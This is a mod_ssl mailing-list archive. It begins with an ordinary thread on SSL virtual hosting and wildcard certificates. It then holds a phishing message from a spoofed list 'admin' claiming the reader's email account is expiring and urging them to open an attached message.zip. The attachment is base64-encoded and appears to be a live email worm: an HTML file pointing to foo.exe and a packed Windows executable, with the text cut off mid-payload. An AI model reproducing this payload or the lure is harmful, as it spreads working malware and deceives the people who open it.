> all using the same wildcard certificate for the SSL handshake.

I think that it is possible as long as the each domain name of your
virtual hosts has the IP address associated with the inet address. 

I believe that the wildcard certificate and domain names are a client
side issue. The browser will check the dn in URL and certificate. I do
not know whether IE still accepts this certificate or not.

If there are any issues in server side, I want to know them.

-Kiyoshi
Kiyoshi Watanabe

 
> If anyone could answer that, it would be great and potentially save some
> messing when it comes to IP addresses.
> 
> Cheers
> 
> JB
> 
> -----Original Message-----
> From: Dave Paris [mailto:dparis@w3works.com] 
> Sent: 21 August 2003 04:59
> To: modssl-users@modssl.org
> Cc: Ian Newlands
> Subject: Re: virtual hosting
> 
> 
> geeze.  is it that time of the month already for this question?  seems 
> like it was just yesterday when it was asked last .. maybe I'm just 
> thinking of the other 100,000 times it was asked.
> 
> in all seriousness, this dead horse has been beaten so many times on 
> this list there isn't even a carcass left to hit at this point.  please 
> go dig through the mail list archives to see why name-based virtual 
> hosts don't work with SSL.
> 
> yes, that's a flippant answer.  no, you're not likely to get a reply 
> any more serious.
> 
> -dsp
> 
> On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:
> 
> > I am currently running about 15 virtual hosts using name based on port
> > 80, and 1 virtual host using SSL.
> >
> > My SSL host is currently working with the following:
> >
> >    
> >
> > However I want to change this to the IP based hosting for this host,
> > allowing me to then add more SSL based virtual hosts on this setup, so 
> > I tried changing this to the following:
> >
> >    
> >
> > By doing this my SSL virtual host stops working altogether.
> >
> > I try the following to debug it on a remote machine:
> >
> >    # openssl s_client -connect 203.xxx.xxx.xxx:443
> >    CONNECTED(00000003)
> >    27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> > protocol:s23_clnt.c:475:
> >
> > I do the exact same thing on the local machine and it responds with a
> > valid SSL response.
> >
> > Can anyone suggest might be wrong here?
> >
> > Regards,
> >
> > Ian Newlands
> >
> > _________________________________________________________________
> > Hotmail is now available on Australian mobile phones. Go to
> > http://ninemsn.com.au/mobilecentral/signup.asp
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> This email has been scanned for all viruses by the MessageLabs SkyScan
> service.
> 
> 
> **********************************************************************************
> This email and any files transmitted with it are confidential, and may be subject to legal privilege, and are intended solely for the use of the individual or entity to whom they are addressed.  
> If you have received this email in error or think you may have done so, you may not peruse, use, disseminate, distribute or copy this message. Please notify the sender immediately and delete the original e-mail from your system.
> 
> Computer viruses can be transmitted by e-mail. Recipients should check this e-mail for the presence of viruses. The Capita Group and its subsidiaries accept no liability for any damage caused by any virus transmitted by this e-mail.
> ***********************************************************************************
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From admin@master.modssl.org  Tue Aug 26 13:42:37 2003
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from localhost (dhcp128-221-18-49.webo.dg.com [128.221.18.49])
	by master.modssl.org (Postfix) with SMTP id BAEF2A8976
	for ; Tue, 26 Aug 2003 13:42:18 +0200 (CEST)
From: admin@master.modssl.org
To: Modssl-users-l 
Reply-To: admin@master.modssl.org
X-Mailer: The Bat! (v1.61)
X-Priority: 2 (High)
Subject: your account                         izaigewg
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------30534EDB0007F58"
Message-Id: <20030826114218.BAEF2A8976@master.modssl.org>
Date: Tue, 26 Aug 2003 13:42:18 +0200 (CEST)

------------30534EDB0007F58
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


Hello there,

I would like to inform you about important information regarding your
email address. This email address will be expiring.
Please read attachment for details.

---
Best regards, Administrator
izaigewg

------------30534EDB0007F58
Content-Type: application/x-zip-compressed; name="message.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="message.zip"

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
